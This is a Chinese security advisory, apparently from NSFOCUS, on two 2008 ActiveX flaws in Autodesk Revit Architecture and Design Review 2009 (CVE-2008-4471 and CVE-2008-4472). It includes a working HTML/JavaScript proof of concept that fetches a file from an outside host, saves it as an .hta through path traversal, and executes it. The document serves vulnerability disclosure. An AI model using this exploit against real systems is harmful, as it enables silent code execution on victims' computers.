安全研究

安全漏洞
Autodesk产品任意程序执行及文件下载漏洞

发布日期:2008-09-30
更新日期:2008-10-06

受影响系统:
Autodesk Revit Architecture 2009
Autodesk Design Review 2009
描述:
BUGTRAQ  ID: 31487,31490
CVE(CAN) ID: CVE-2008-4471,CVE-2008-4472

Autodesk Revit Architecture和Design Review都是流行的工业制图和建模软件。

Autodesk Revit Architecture和Design Review产品所提供的CExpressViewerControl类(AdView.dll)没有正确地验证对SaveAS()方式的调用,允许攻击者在用户系统上存储任意扩展名的文件;UpdateEngine类(LiveUpdate16.DLL)没有正确地验证对ApplyPatch()方式的调用,允许远程攻击者通过第二个输入参数启动任意可执行程序。

<*来源:bruiser
  
  链接:http://retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<HTML>
<OBJECT CLASSID="clsid:A662DA7E-CCB7-4743-B71A-D817F6D575DF"
WIDTH="640" HEIGHT="480"
id='CExpressViewerControl' >
<PARAM NAME="Src"
VALUE="http://retrogod.altervista.org/suntzu.dwf">
</OBJECT>
<OBJECT CLASSID='clsid:89EC7921-729B-4116-A819-DF86A4A5776B'
id='UpdateEngine' />
</OBJECT>
<script type="text/javascript">
<!--
   strPatchFile = "..\\..\\..\\..\\..\\..\\..\\suntzu.hta";

try
{
   CExpressViewerControl.SaveAS (strPatchFile);
}
catch(e)
{
   document.write("impossible to save suntzu.hta ...");
}
finally
{
}
   strProductCode="whatever" ;

try
{
   UpdateEngine.ApplyPatch (strProductCode , strPatchFile);
}
catch(e)
{
   document.write("impossible to execute suntzu.hta ...");
}
finally
{
}

建议:
厂商补丁:

Autodesk
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://usa.autodesk.com

浏览次数:2737
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障